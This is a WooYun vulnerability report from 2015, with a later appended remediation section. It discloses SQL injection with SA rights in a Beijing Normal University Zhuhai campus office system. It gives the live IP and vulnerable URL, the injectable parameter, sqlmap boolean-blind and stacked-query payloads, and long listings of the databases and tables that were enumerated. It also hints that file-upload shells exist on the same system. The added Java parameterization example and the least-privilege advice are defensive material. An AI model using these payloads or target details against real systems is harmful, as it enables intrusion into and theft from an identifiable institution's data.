Vulnerability summary

Defect ID: wooyun-2015-0164257

Title: SQL injection in a Beijing Normal University system (SA privileges)

Vendor: 北京师范大学 (Beijing Normal University)

Author: Lar2y

Submitted: 2015-12-24 17:37

Fix date: 2015-12-29 17:38

Published: 2015-12-29 17:38

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-24: Details sent to the vendor; awaiting vendor handling
2015-12-29: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As titled.

Detailed description:

SQL injection in the office system of the Beijing Normal University Zhuhai campus.
As I recall there were also arbitrary-upload GETSHELL issues, so check those yourselves; this one is only the injection.

Proof of vulnerability:

Address: http://59.38.32.31:8080/login/index.jsp

[screenshot: 1.jpg]


Injection URL: http://59.38.32.31:8080/showphoto.xf?photoid=126

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Parameter: photoid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: photoid=126 AND 6987=6987
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: photoid=126;WAITFOR DELAY '0:0:5'--
---
web application technology: Servlet 2.4, Tomcat 4.0.4.
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] FE_APP5
[*] FE_BASE5
[*] FE_ERP
[*] master
[*] model
[*] msdb
[*] ReportServer$FEOA
[*] ReportServer$FEOATempDB
[*] tempdb


Too many tables, so I didn't keep running it...

Database: FE_ERP
[159 tables]
+------------------------+
| ERP_ACCOUNT_INFO |
| ERP_APIRUN_INFO |
| ERP_API_INFO |
| ERP_API_VO_DETAIL |
| ERP_API_VO_INFO |
| ERP_COLFE_DETAIL |
| ERP_DATA_TEST_DETAIL |
| ERP_DATA_TEST_INFO |
| ERP_FE_DETAIL |
| ERP_FE_INFO |
| ERP_FE_MAPING |
| ERP_HISTORY_DETAIL |
| ERP_HISTORY_INFO |
| ERP_MESSAGE_INFO |
| ERP_ONEKEY_DETAIL |
| ERP_ONEKEY_INFO |
| ERP_ORG_HISTORY |
| ERP_ORG_HISTORY_DETAIL |
| ERP_ORG_SET |
| ERP_ORG_SET1 |
| ERP_REGISTER_LOGIC |
| ERP_SYNCFILTER_DETAIL |
| ERP_SYNCFILTER_INFO |
| ERP_SYNCTYPE_INFO |
| ERP_SYNC_DETAIL |
| ERP_SYNC_INFO |
| ERP_SYNC_ORG |
| ERP_TABLE_INFO |
| ERP_TCOLS_INFO |
| ERP_TEMPLATE_DETAIL |
| ERP_TEMPLATE_INFO |
| NC_ARAP_DJFB |
| NC_ARAP_DJFKXYB |
| NC_ARAP_DJLX |
| NC_ARAP_DJZB |
| NC_ARAP_ITEM |
| NC_BD_ACCSUBJ |
| NC_BD_ADDRESS |
| NC_BD_AREACL |
| NC_BD_BALATYPE |
| NC_BD_BANKACCBAS |
| NC_BD_BDINFO |
| NC_BD_BILLTYPE |
| NC_BD_BUSITYPE |
| NC_BD_CALBODY |
| NC_BD_CASHFLOW |
| NC_BD_COMABSTR |
| NC_BD_CORP |
| NC_BD_COSTSUBJ |
| NC_BD_CUBASDOC |
| NC_BD_CUMANDOC |
| NC_BD_CURRRATE |
| NC_BD_CURRTYPE |
| NC_BD_CUSTADDR |
| NC_BD_CUSTBANK |
| NC_BD_DEPTDOC |
| NC_BD_GLORG |
| NC_BD_GLORGBOOK |
| NC_BD_INVBASDOC |
| NC_BD_INVCL |
| NC_BD_INVMANDOC |
| NC_BD_JOBBASFIL |
| NC_BD_MEASDOC |
| NC_BD_NOTETYPE |
| NC_BD_PAYTERM |
| NC_BD_PSNBASDOC |
| NC_BD_PSNCL |
| NC_BD_PSNDOC |
| NC_BD_SALESTRU |
| NC_BD_SENDTYPE |
| NC_BD_STORDOC |
| NC_BD_SUBJASS |
| NC_BD_TAXITEMS |
| NC_BD_VOUCHERTYPE |
| NC_CMP_BUSIBILL |
| NC_CMP_BUSIBILL_B |
| NC_CUSTOMER_SYNC |
| NC_DEPTDOC_SYNC |
| NC_ER_REIMTYPE |
| NC_HI_PSNDOC_DEPTCHG |
| NC_INVCL_SYNC |
| NC_INVENTORY_SYNC |
| NC_LEAVE_TYPE |
| NC_LOAN_APPLY |
| NC_MEANS_SYNC |
| NC_OM_DUTY |
| NC_OM_JOB |
| NC_PO_PRAYBILL |
| NC_PO_PRAYBILL_B |
| NC_SALESTRU_SYNC |
| NC_SALE_APPLY |
| NC_SALE_APP_SUB |
| NC_SM_CODETOCODE |
| NC_SM_CREATECORP |
| NC_SM_USER |
| NC_SM_USERANDCLERK |
| NC_SM_USER_ROLE |
| NC_SO_INVTOCALBODY |
| NC_SUBJECT_ASSIST |
| NC_SUBJECT_ASSISTS |
| NC_SUBJECT_SYNC |
| NC_TBM_AWAYB |
| NC_TBM_AWAYH |
| NC_TBM_PSNDOC |
| NC_TBM_TIMEITEM |
| OA_JKD |
| U8_AA_AGREEMENT |
| U8_AA_ENUM |
| U8_AP_CLOSEBILL |
| U8_AP_CLOSEBILLS |
| U8_AP_VOUCH |
| U8_AP_VOUCHS |
| U8_CM_GROUP |
| U8_CODE |
| U8_COMPUTATIONUNIT |
| U8_CUSTOMER |
| U8_DEPARTMENT |
| U8_DISPATCHLIST |
| U8_DISPATCHLISTS |
| U8_DSIGN |
| U8_EXCH |
| U8_FITEM |
| U8_FITEMSS00 |
| U8_FITEMSS97 |
| U8_FITEMSS97CLASS |
| U8_FITEMSS98 |
| U8_FOREIGNCURRENCY |
| U8_GL_ACCVOUCH |
| U8_GL_ACCVOUCHS |
| U8_GRADEDEF |
| U8_HR_HI_JOBINFO |
| U8_HR_HI_PERSON |
| U8_HR_OM_JOB |
| U8_INVENTORY |
| U8_PAYCONDITION |
| U8_PO_PODETAILS |
| U8_PO_POMAIN |
| U8_PURCHASETYPE |
| U8_PU_APPVOUCH |
| U8_PU_APPVOUCHS |
| U8_PU_ARRIVALVOUCH |
| U8_PU_ARRIVALVOUCHS |
| U8_RDRECORD01 |
| U8_RDRECORDS01 |
| U8_RD_STYLE |
| U8_SALETYPE |
| U8_SA_CUSUPRICE |
| U8_SETTLESTYLE |
| U8_SHIPPINGCHOICE |
| U8_SO_SODETAILS |
| U8_SO_SOMAIN |
| U8_UA_MENU |
| U8_UA_USER |
| U8_VENDOR |
| U8_VOUCHERNUMBER |
| U8_WAREHOUSE |
| V_ERP_API_VO_DETAIL |
| V_SYNC_DEPLOY |
| dtproperties |
+------------------------+


Database: FE_BASE5
[307 tables]
+------------------------------+
| ABC |
| APPRV_FLOW |
| APPRV_FLOW_INT |
| APPRV_FLOW_RES |
| APPRV_FLOW_SUB |
| APPRV_RESOURCE |
| APPRV_RESOURCE_SUB |
| APP_LEADER_ADD |
| APP_LEADER_ADD_V |
| APP_LEADER_CALENDAR |
| APP_LEADER_SUB |
| ARRANGE_CALENDAR |
| ASSET |
| ASSET_USE |
| ASSET_V |
| CALENDAR |
| CHAT |
| COMMON_LEMMA |
| COMMON_LEMMA_V |
| CTRLDATATYPE_VIEW |
| CTRLPROPERTY_VIEW |
| DEFINEGROUP_V |
| DESKTOP_CONFIG_V |
| DESKTOP_CONTAINER |
| DESKTOP_CONTAINER_GADGET |
| DESKTOP_CONTAINER_USER |
| DESKTOP_GADGET |
| DESKTOP_MENU_MANAGEMENT |
| DESKTOP_MENU_MANAGEMENT_TEMP |
| DESKTOP_PEOPLE_PLUGIN |
| DESKTOP_PLUGIN_MANAGEMENT |
| DESKTOP_PLUGIN_SETTING |
| DESKTOP_SET |
| DESK_USERJJCD |
| DOCUMENTS_LIST |
| DRAFT_CONFIG_V |
| DRAFT_MENU_V |
| DRAFT_SET |
| ENTERPRISE_SMS |
| FACEITEM_V |
| FACE_V |
| FE_LOG |
| FE_USERS |
| FLOWCODE_CONFIG |
| FLOWCODE_VALUE |
| FLOW_CLASS_SET |
| FLOW_MENU_V |
| FOLDER_ATTRIBUTE |
| FOLDER_POPUDOM |
| FOLDER_TYPE |
| FUNCTION_TABLE_V |
| GONGGAOVIEW_V |
| GONGGAO_DESK_V |
| GROUP_ROLE_USER_V |
| GROUP_ROLE_V |
| GROUP_USER_LEVEL_V |
| GROUP_USER_SORT_V |
| GROUP_USER_V |
| GROUP_U_V_D |
| G_R_U_YZ_V |
| IDEAMANAGE |
| INFOR_YIBAN |
| LAYOUT_VIEW |
| LEADER_APP_V |
| LEADER_CALENDAR_V |
| MESSAGEINFOR |
| MESSAGEINFOR_HISTORY |
| MESSAGE_SET_V |
| MESSAGE_USER_V |
| MODEL_NODE_ALL_V |
| MODEL_NODE_R_V |
| NC_SYN_HISTORY |
| NC_SYN_HISTORY_DETAIL |
| NC_SYN_ORG |
| NEWBIE |
| NEWSVIEW_V |
| NEWS_DESK_V |
| PHONE_LOGIN |
| PLURALIST_POST_V |
| PORTAL_CONTAINER |
| PORTAL_INFO |
| PORTAL_PLUGIN |
| PORTAL_PLUGINS |
| PORTAL_PN_POLICY |
| PORTAL_PN_POLICY_SUB |
| PORTAL_PN_POPUDOM |
| PORTAL_PN_SETUP |
| PORTAL_PP_CONFIG |
| PORTAL_PP_CONFIG_SUB |
| PORTAL_SETTINGS |
| PORTAL_SETTINGS_DETAILS |
| PORTAL_SHOW_DEFAULT |
| PORTAL_TEMPLATE |
| PORTAL_USERS |
| PROXY_NODE |
| PROXY_SET |
| PROXY_V |
| QUICK_CONFIG_V |
| RECENT_MENU_V |
| REFERENCE_UNION |
| REPORT_ELEMENT |
| REPORT_FACEPROMPT_INFOR |
| REPORT_SET |
| RESEARCH_OPTION |
| RESEARCH_PUBLISHER |
| RESEARCH_SUB |
| RESEARCH_TOPIC |
| RESEARCH_TOPIC_V |
| RESEARCH_VOTER |
| RESOURCE_INFO |
| RESOURCE_LIST |
| RESOURCE_REG_SET |
| RESOURCE_USE_SET |
| RICHENG |
| RICHENG_LEADER_V |
| ROW_POPEDOM_V |
| SEARCH_CONFIG |
| SFGL_FFGL_V |
| SMS_DRFTBL |
| SMS_IBXTBL |
| SMS_ORDTBL |
| SMS_SNTTBL |
| SMS_TOTTBL |
| SORT_INFOR |
| SORT_LINK_FIELD |
| SORT_VIEW |
| STAFF_GROUP_USER_V |
| STAMP_KEY_RELATION |
| STOCKSP |
| STOCKSP_VIEW |
| STOCK_SUB |
| STOCK_SUB_TMP |
| SYS_ATTACHMENT |
| SYS_BIZLOGIC |
| SYS_CACHET |
| SYS_CACHETASSIGN |
| SYS_COLLABORATIVE |
| SYS_COLLABORATIVE_MODIFY |
| SYS_COLLABORATIVE_MOUDLE |
| SYS_CONTROL |
| SYS_CTRLDATATYPE |
| SYS_CTRLPROPERTY |
| SYS_CTRLPROPS |
| SYS_CTRLPROPVIEW |
| SYS_DATABASE |
| SYS_DATALINK |
| SYS_DATATYPE |
| SYS_DFGROUP |
| SYS_DGR |
| SYS_DOC_MEMU |
| SYS_DOC_SIGNATURE |
| SYS_DRIVER |
| SYS_DUTY |
| SYS_EMAILINFO |
| SYS_EVENT |
| SYS_EVENT_PAGE |
| SYS_EXCEPTION |
| SYS_EXTURL |
| SYS_FACE |
| SYS_FACECTRLPROP |
| SYS_FACEDATABUF |
| SYS_FACEEVENT |
| SYS_FACEFILE |
| SYS_FACEITEM |
| SYS_FACEPROMPT |
| SYS_FACEPROP |
| SYS_FACE_V |
| SYS_FAVORITE |
| SYS_FCSTYLE |
| SYS_FIELD |
| SYS_FILEBUFFER |
| SYS_FLOWTYPE |
| SYS_FORM_INFO |
| SYS_FUNCTION |
| SYS_FUNCTION_USER |
| SYS_FUNCTION_temp |
| SYS_GROUP |
| SYS_GROUP_LOG |
| SYS_GROUP_TEMP |
| SYS_GROUP_USER |
| SYS_HOLIDAY |
| SYS_INDEX |
| SYS_IPLOGIN_RULE |
| SYS_IPNOTVERIFY |
| SYS_JGSTAMP |
| SYS_JGSTAMP_KEY |
| SYS_JGSTAMP_RELATION |
| SYS_LOG |
| SYS_LOGINKEY |
| SYS_LOG_SETUP |
| SYS_MESSAGES |
| SYS_MOBILEINFO |
| SYS_MON_RIGHT |
| SYS_MWF |
| SYS_MWF_V |
| SYS_PAGE |
| SYS_PLUGINS |
| SYS_PLURALIST |
| SYS_POPEDOM_COLUMN |
| SYS_POPEDOM_ROW |
| SYS_POPEDOM_TEMPLET |
| SYS_POPEDOM_TEMP_SUB |
| SYS_QUERY_SETUP |
| SYS_REDIRECT |
| SYS_REGISTER |
| SYS_ROLE |
| SYS_SELT_LOGIC |
| SYS_STAMP |
| SYS_STAMPCA |
| SYS_STAMPTYPE |
| SYS_TABLE |
| SYS_TABLE_KEY |
| SYS_TEST |
| SYS_TEST_FE35_PRO |
| SYS_TEST_SUB |
| SYS_TRACK_SETUP |
| SYS_TRACK_SETUP_SUB |
| SYS_TRACK_VO |
| SYS_TRACK_VO_SUB |
| SYS_USERS |
| SYS_USER_CONFIG |
| SYS_USER_ROLE |
| SYS_USER_SKIN |
| SYS_USER_STATUS |
| SYS_USER_TEMPLET |
| SYS_VIEWSQL |
| SYS_WORKTIME |
| TABLE_FIELD_V |
| TABLE_SORT_V |
| TABLE_V |
| TASK_FFGL_V |
| TASK_INOFR_USER_V |
| TASK_SFGL_V |
| TASK_SUPERVISORY_V |
| TASK_USER_V |
| TEMPLET_GROUP_V |
| TESTSDDS |
| TRUSTDEVICELIST |
| USER_DESKTOP_CONFIG |
| USER_DESKTOP_RECENT |
| USER_DOC_LIST |
| USER_EVENT |
| USER_EVENT_V |
| USER_GROUP_DEFAULT |
| USER_GROUP_LEFT_V |
| USER_GROUP_V |
| USER_G_L_V |
| USER_LOAD_V |
| USER_RELAPER_SUB |
| USER_RELATION_PER |
| USER_ROLE_V |
| USER_R_V |
| USER_TEMPLET_V |
| VACATION |
| VIEW_CALENDAR |
| VIEW_DAIBAN |
| V_ARRANGE_CALENDAR |
| V_LEADER_SET |
| V_RELATION_PER |
| WF_ACTION |
| WF_CLASS |
| WF_CO_MODEL |
| WF_CO_NODE |
| WF_DEFAULT_CONFIG |
| WF_DOC_ADDITIONAL |
| WF_FLOWPIC |
| WF_INFOR |
| WF_INFOR_HURRY |
| WF_INFOR_V |
| WF_INFOR_XY_V |
| WF_LIGHT |
| WF_LIGHT_CONFIG |
| WF_LINKS |
| WF_MODEL |
| WF_MONITOR_DATA |
| WF_MONITOR_SELECTOR |
| WF_MONITOR_SETUP |
| WF_MONITOR_SETUP_FLOW |
| WF_NODES |
| WF_NODE_TRACE |
| WF_ROLES |
| WF_ROLE_ALLOC |
| WF_SUBFLOW_BO_MAP |
| WF_SUBFLOW_CONF |
| WF_SUPERVISORY |
| WF_TASK |
| WF_TASK_TRACER |
| WF_TASK_TRACER_V |
| WITSETLIST |
| WORKED_NODEINFO |
| WORKFLOW_USER_V |
| WORKPLAN |
| WORKPLAN_MOUDLE |
| WORKPLAN_V |
| WORK_AGE_SET |
| WORK_LOG |
| WORK_LOG_V |
| WORK_TAG |
| XML_TABLE_CONF |
| XML_TABLE_FILTER |
| XML_TABLE_SUB |
| XY_USER_ROLE_V |
| dtproperties |
| group_aaa_temp |
| hack |
| sqlmapoutput |
| temp_split |
+------------------------------+

Fix recommendation:

Fix it.
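The report's fix recommendation is a single word, so the following is an added illustration, not code from the original report or from the affected system (whose source is not shown), of the standard remediation for a finding like the photoid parameter above: a hypothetical Java data-access class in the style of the Servlet/JSP stack sqlmap identified, with the concatenated query beside its parameterized replacement. The class and method names, the photos table and the path column are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

// Hypothetical data-access class for a "show photo by id" endpoint such as
// showphoto.xf?photoid=126. Class, method, table and column names are assumptions;
// the real application's code is not on the page.
public class PhotoDao {

    // BEFORE: the request parameter is concatenated straight into the SQL text.
    // Any non-numeric value changes the structure of the query, and because the
    // SQL Server driver accepts batched statements, a second statement appended
    // after a ';' also runs, which is what the "stacked queries" finding means.
    public static String findPhotoVulnerable(Connection conn, String photoIdParam)
            throws SQLException {
        String sql = "SELECT path FROM photos WHERE photoid = " + photoIdParam;
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getString(1) : null;
        }
    }

    // AFTER: validate the type at the boundary and bind the value as a parameter.
    // The SQL text is fixed before any user data is seen; the driver sends the
    // integer as data, so it can never be parsed as part of the statement.
    public static String findPhotoSafe(Connection conn, String photoIdParam)
            throws SQLException {
        int photoId = parsePhotoId(photoIdParam);
        String sql = "SELECT path FROM photos WHERE photoid = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, photoId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    // Reject anything that is not a short positive integer before it reaches the
    // database; a 400 response from the caller is the right outcome for bad input.
    static int parsePhotoId(String raw) {
        if (raw == null || !raw.matches("\\d{1,9}")) {
            throw new IllegalArgumentException("photoid must be a positive integer");
        }
        return Integer.parseInt(raw);
    }
}
```

Parameterization closes the injection itself; the "(SA privileges)" in the title points at a second, independent problem. The application's database login evidently holds sa rights, which is why one injectable parameter exposed all nine databases on the instance, including master and msdb. Running the application under a login restricted to its own schemas bounds the damage of any query the code review misses.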

Copyright notice: when reposting, please credit the source: Lar2y@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-12-29 17:38

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet